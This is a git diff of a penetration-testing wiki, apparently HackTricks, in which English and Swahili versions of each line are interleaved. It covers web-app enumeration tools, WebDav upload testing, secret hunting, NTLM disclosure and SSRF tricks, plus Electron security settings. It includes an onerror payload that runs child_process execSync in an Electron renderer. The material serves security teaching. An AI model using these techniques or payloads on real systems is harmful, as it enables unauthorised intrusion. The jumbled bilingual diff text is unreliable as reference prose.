#### **Angalia kama unaweza kupakia files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
Ikiwa utagundua kwamba **WebDav** imewezeshwa lakini huna ruhusa za kutosha za **uploading files** kwenye root folder jaribu:
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
- **Brute Force** credentials
- **Upload files** via WebDav kwenye **rest** ya **found folders** ndani ya web page. Huenda ukaweza kuwa na ruhusa za kupakia files katika folda nyingine.
- **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
### **SSL/TLS vulnerabilites**
- Ikiwa application **isn't forcing the user of HTTPS** sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa application inatumia **HTTP** kutuma data nyeti (passwords). Hii ni vulnerability kubwa.
- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
- If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika Bug Bounty programs pengine aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) ili kukagua tena vulnerabilities:
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
@ -196,60 +196,60 @@ Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulne
sslscan <host:port>
sslyze --regular <ip:port>
```
Information about SSL/TLS vulnerabilities:
Taarifa kuhusu udhaifu wa SSL/TLS:
- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### Spidering
Launch some kind of **spider** inside the web. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwenye application inayotestwa. Kwa hivyo, web crawling na vyanzo vya nje zinapaswa kutumika kupata njia halali nyingi iwezekanavyo.
Anzisha aina fulani ya **spider** ndani ya tovuti. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwa programu inayojaribiwa. Hivyo, web crawling na vyanzo vya nje vinapaswa kutumika ili kupata njia halali nyingi iwezekanavyo.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. Unaweza kutoa tu faili yenye hosts na faili yenye paths na meg itachukua kila path kwa kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools.
- [**subjs**](https://github.com/lc/subjs) (go): Find JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Awesome tool for this.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Print every link it's able to find.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder katika JS files na vyanzo vya nje (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files na Archive.org kama chanzo cha nje.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, pia inaonyesha "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. Pia inatafuta kwenye Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): Tool hii si spider lakini inaweza kuwa muhimu. Unaweza kubainisha faili yenye hosts na faili yenye paths na meg itachukua kila path kwenye kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider yenye uwezo wa JS rendering. Hata hivyo, inaonekana haitunzwi, version iliyotayarishwa kabla ni ya zamani na code ya sasa haitaundwa.
- [**gau**](https://github.com/lc/gau) (go): HTML spider ambayo inatumia providers za nje (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Script hii itapata URLs zenye parameter na kuziorodhesha.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider yenye uwezo wa JS rendering.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, yenye JS beautify capabilities inayoweza kutafuta njia mpya katika JS files. Inaweza kufaa pia kuangalia [JSScanner](https://github.com/dark-warlord14/JSScanner), ambayo ni wrapper ya LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Kutoka endpoints katika chanzo cha HTML na embedded javascript files. Inafaa kwa bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): Script ya python 2.7 kutumia Tornado na JSBeautifier kuchanganua relative URLs kutoka JavaScript files. Inafaa kwa kufichua AJAX requests kwa urahisi. Inaonekana haitunzwi.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Ikipewa faili (HTML) itachukua URLs kutoka kwake kutumia regex nzuri kupata na kutoa relative URLs kutoka kwa faili zilizo minified.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Kusanya taarifa za kuvutia kutoka JS files kutumia zana mbalimbali.
- [**subjs**](https://github.com/lc/subjs) (go): Tafuta JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Pakia ukurasa katika headless browser na chapisha URLs zote zilizopewa ili kupakua ukurasa.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Tool ya discovery ya maudhui ikichanganya chaguo kadhaa za zana zilizotajwa hapo juu
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): Burp extension kutafuta path na params katika JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): Tool ambayo ikibainisha .js.map URL itakuletea code ya JS iliyobebwa vizuri
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Tool inayotumika kugundua endpoints kwa target iliyotolewa.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Gunduzi links kutoka wayback machine (pia kupakua responses kwenye wayback na kutafuta links zaidi)
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (hata kwa kujaza forms) na pia pata info nyeti kwa kutumia regex maalum.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite ni GUI ya kukuza web security Crawler/Spider iliyoendelea kwa wataalamu wa cybersecurity.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): Ni Go package na [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) kwa kuchukua URLs, paths, secrets, na data nyingine za kuvutia kutoka JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge ni extension rahisi ya **Burp Suite** ya **kuchukua paramters na endpoints** kutoka request ili kuunda wordlist ya custom kwa fuzzing na enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Tool nzuri kwa hili.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Chapisha kila link inayoweza kupatikana.
### Brute Force directories and files
Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\
Tools:
Anza **brute-forcing** kutoka kwenye folda ya mizizi na hakikisha unafanya brute-force kwa **direktori zote zilizopatikana** kwa kutumia **mbinu hii** na direktori zote **zilizoonekana** wakati wa **Spidering** (unaweza kufanya brute-forcing hii **kimaendeleo** na kuongeza mwanzoni mwa wordlist inayotumika majina ya direktori zilizopatikana).\
Zana:
- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
- **Dirb** / **Dirbuster** - Imejumuishwa katika Kali, **zamani** (na **polepole**) lakini inafanya kazi. Inaruhusu auto-signed certificates na recursive search. Polepole sana ikilinganishwa na chaguo nyingine.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Haikaiwezi auto-signed certificates lakini** inaruhusu recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): Inaruhusu auto-signed certificates, **haina** recursive search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Haraka, inaunga mkono recursive search.**
- [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
- [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
- [**uro**](https://github.com/s0md3v/uro) (python): Hii si spider lakini ni tool ambayo ikipewa orodha ya URLs zilizopatikana itafuta kuondoa URLs "zilizo duplicated".
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension ya kuunda orodha ya directories kutoka burp history ya kurasa mbalimbali
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Ondoa URLs zenye functionalities za duplicated (kulingana na js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): Inatumia wapalyzer kugundua teknolojia zinazotumika na kuchagua wordlists za kutumia.
**Recommended dictionaries:**
Recommended dictionaries:
- [https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
- [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
@ -268,41 +268,41 @@ Tools:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Force._
_Kumbuka kwamba kila wakati direktori mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Forced._
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Tafuta broken links ndani ya HTML zinazoweza kuwa hatarini kwa takeover
- **File Backups**: Mara ukimaliza kupata faili zote, tazama backups za faili zote za executable ("_.php_", "_.aspx_"...). Mienendo ya kawaida ya kuitia jina backup ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **au** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: Unaweza kutumia zana kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **na** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameters zilizofichika. Ikiwa inawezekana, unaweza kutafuta parameters zilizofichika kwenye kila faili ya executable ya wavuti.**
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
- _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
- _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
- **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
- If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
- **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html).
- **Comments:** Angalia comments za faili zote, unaweza kupata **credentials** au **hidden functionality**.
- Ikiwa unacheza **CTF**, hila ya kawaida ni **kuweka** **taarifa** ndani ya comments upande wa **kulia** wa ukurasa (kutumia mamia ya **spaces** ili usiioneshe data ukifungua source code kwa browser). Mwingine uwezekano ni kutumia **several new lines** na **kuficha taarifa** katika comment upande wa **chini** wa ukurasa wa wavuti.
- **API keys**: Ikiwa utapata API key yoyote kuna miongozo inayoonyesha jinsi ya kutumia API keys za platform tofauti: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: Ikiwa utapata API key inayofanana na **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuangalia ni APIs gani key inaweza kufikia.
- **S3 Buckets**: Wakati wa spidering angalia kama subdomain yoyote au link yoyote inahusiana na S3 bucket. Katika hicho kesi, [**angalia** ruhusa za bucket](buckets/index.html).
### Special findings
**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
**Wakati** unafanya **spidering** na **brute-forcing** unaweza kukutana na vitu **vya kuvutia** ambavyo unapaswa kuyazingatia.
**Interesting files**
- Look for **links** to other files inside the **CSS** files.
- Tafuta **links** za faili zingine ndani ya CSS files.
- [If you find a _**.git**_ file some information can be extracted](git.md)
- If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
- If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
- **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
- You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
- Ikiwa utapata _**.env**_ taarifa kama api keys, passwords za db na taarifa nyingine zinaweza kupatikana.
- Ikiwa utapata **API endpoints** unapaswa [kujaribu pia](web-api-pentesting.md). Hizi si faili, lakini huenda "zinaonekana" kama faili.
- **JS files**: Katika sehemu ya spidering zimetajwa zana kadhaa zinazoweza kutoa paths kutoka kwa JS files. Pia, itakuwa nzuri **kufuata kila JS file** iliyoonekana, kwa kuwa mara nyingine mabadiliko yanaweza kuashiria kuwa udhaifu umeletwa kwenye code. Unaweza kutumia kwa mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kuangalia JS files zilizogunduliwa na [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) ili kuona kama zina udhaifu.
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- **TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
- **TrainFuck**](https://github.com/taco-cy/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- Katika matukio kadhaa, utahitaji **kuelewa regular expressions** zinazotumika. Hii itakuwa muhimu: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Unaweza pia **kufuatilia faili zilizo detect kuwa na forms**, kwani mabadiliko ya parameter au kuonekana kwa form mpya kunaweza kuashiria functionality mpya yenye udhaifu.
**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
@ -313,28 +313,28 @@ _Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing
**502 Proxy Error**
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
Ikiwa ukurasa wowote unajibu na code hiyo, ina maana kuna proxy iliyopangwa vibaya. **Ikiwa utatuma HTTP request kama: `GET https://google.com HTTP/1.1`** (na host header na headers nyingine za kawaida), proxy itajaribu kufikia _**google.com**_ na utakuwa umepata SSRF.
**NTLM Authentication - Info disclosure**
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** (and asking for **domain** **name**), you can provoke an **information disclosure**.\
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info (IIS version, Windows version...) inside the header "WWW-Authenticate".\
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
Ikiwa server inayotumia inauliza authentication ni **Windows** au ukapata login inayoomba **credentials** zako (na kuomba **domain** **name**), unaweza kusababisha disclosure ya taarifa.\
**Tuma** header: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **NTLM authentication** inavyofanya kazi, server itajibu na info za ndani (toleo la IIS, toleo la Windows...) ndani ya header "WWW-Authenticate".\
Unaweza **kuweka mchakato wa automati** kwa kutumia nmap plugin "_http-ntlm-info.nse_".
**HTTP Redirect (CTF)**
It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** (as the browser will execute the redirection) but something could be **hidden** in there.
Inawezekana **kuweka maudhui** ndani ya **Redirection**. Maudhui haya **hayataonyeshwa kwa mtumiaji** (kwa kuwa browser itatekeleza redirect) lakini kitu kinaweza **kufichwa** ndani yake.
### Web Vulnerabilities Checking
Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:
Sasa baada ya kufanyika upimaji mpana wa programu ya wavuti, ni wakati wa kuangalia udhaifu mwingi unaowezekana. Unaweza kupata checklist hapa:
{{#ref}}
../../pentesting-web/web-vulnerabilities-methodology.md
{{#endref}}
Find more info about web vulns in:
Pata taarifa zaidi kuhusu web vulns katika:
- [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
- [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
@ -342,7 +342,7 @@ Find more info about web vulns in:
### Monitor Pages for changes
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
Unaweza kutumia zana kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza udhaifu.
### HackTricks Automatic Commands
```

221
src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
View File

@ -4,27 +4,27 @@
## Utangulizi
Electron huunganisha backend ya ndani (ikiwa na **NodeJS**) na frontend (**Chromium**), ingawa ina upungufu wa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.
Electron huunganisha backend ya ndani (na **NodeJS**) na frontend (**Chromium**), ingawa haijumuishi baadhi ya mifumo ya usalama ya vichunguzi vya kisasa.
Mara nyingi unaweza kupata msimbo wa app ya electron ndani ya programu ya `.asar`; ili kupata msimbo unahitaji kuutoa:
Mara nyingi utapata msimbo wa programu ya Electron ndani ya faili la `.asar`; ili kupata msimbo, unahitaji kuliondoa:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
Katika msimbo wa chanzo wa app ya Electron, ndani ya `packet.json`, unaweza kupata faili `main.js` iliyobainishwa ambapo mipangilio ya usalama imewekwa.
Katika msimbo wa chanzo wa app ya Electron, ndani ya `packet.json`, unaweza kupata faili `main.js` iliyobainishwa ambapo security configs zimewekwa.
```json
{
"name": "standard-notes",
"main": "./app/index.js",
```
Electron ina aina mbili za mchakato:
Electron ina aina mbili za michakato:
- Main Process (ina ufikiaji kamili wa NodeJS)
- Renderer Process (inapaswa kuwa na ufikiaji mdogo wa NodeJS kwa sababu za usalama)
- Mchakato Mkuu (ina ufikiaji kamili wa NodeJS)
- Mchakato wa Renderer (unapaswa kuwa na ufikiaji uliopunguzwa wa NodeJS kwa sababu za usalama)
![](<../../../images/image (182).png>)
Mchakato wa **renderer process** utakuwa dirisha la kivinjari linalopakia faili:
Mchakato wa **renderer** utakuwa dirisha la kivinjari linalopakia faili:
```javascript
const { BrowserWindow } = require("electron")
let win = new BrowserWindow()
@ -32,20 +32,20 @@ let win = new BrowserWindow()
//Open Renderer Process
win.loadURL(`file://path/to/index.html`)
```
Mipangilio ya **renderer process** yanaweza **kusanidiwa** katika **main process** ndani ya faili main.js. Baadhi ya mipangilio yatazuia programu ya Electron kupata **RCE** au udhaifu mwingine ikiwa **mipangilio imewekwa ipasavyo**.
Mipangilio ya **mchakato wa renderer** yanaweza **kuwekwa** katika **mchakato mkuu** ndani ya faili main.js. Baadhi ya mipangilio hiyo itaweza **kuzuia Electron application kupata RCE** au udhaifu mwingine ikiwa **mipangilio imewekwa ipasavyo**.
Programu ya Electron inaweza **kufikia kifaa** kupitia Node apis ingawa inaweza kusanidiwa kuizuia:
The electron application **inaweza kufikia kifaa** kupitia Node apis ingawa inaweza kuwekewa mipangilio ili kuzuia hilo:
- **`nodeIntegration`** - kwa chaguo-msingi ni `off`. Ikiwa `on`, inaruhusu kufikia vipengele vya Node kutoka kwenye **renderer process**.
- **`contextIsolation`** - kwa chaguo-msingi ni `on`. Ikiwa `off`, **main** na **renderer processes** hazitenganishwi.
- **`preload`** - tupu kwa chaguo-msingi.
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - kwa chaguo-msingi ni `off`. Itazuia vitendo ambavyo NodeJS inaweza kufanya.
- **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
- **`contextIsolation`** - is `on` by default. If off, main and renderer processes aren't isolated.
- **`preload`** - empty by default.
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
- Node Integration in Workers
- **`nodeIntegrationInSubframes`** - kwa chaguo-msingi ni `off`.
- Ikiwa **`nodeIntegration`** imewezeshwa, hii itaruhusu matumizi ya **Node.js APIs** katika kurasa za wavuti zinazopakiwa ndani ya **iframes** ndani ya programu ya Electron.
- Ikiwa **`nodeIntegration`** imezimwa, basi preloads zitaanzishwa ndani ya iframe
- **`nodeIntegrationInSubframes`**- is `off` by default.
- If **`nodeIntegration`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
- If **`nodeIntegration`** is **disabled**, then preloads will load in the iframe
Mfano wa usanidi:
Example of configuration:
```javascript
const mainWindowOptions = {
title: "Discord",
@ -97,14 +97,13 @@ onerror="alert(require('child_process').execSync('uname -a').toString());" />
```
### Kukamata trafiki
Badilisha usanidi wa start-main na ongeza matumizi ya proxy kama:
Badilisha usanidi wa start-main na uongeze matumizi ya proxy kama:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Electron Local Code Injection
Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba unaweza kuifanya itekeleze arbitrary javascript code. Angalia jinsi katika:
Ikiwa unaweza kuendesha App ya Electron kwa ndani, kuna uwezekano unaweza kuifanya iendeshe msimbo wowote wa javascript. Angalia jinsi katika:
{{#ref}}
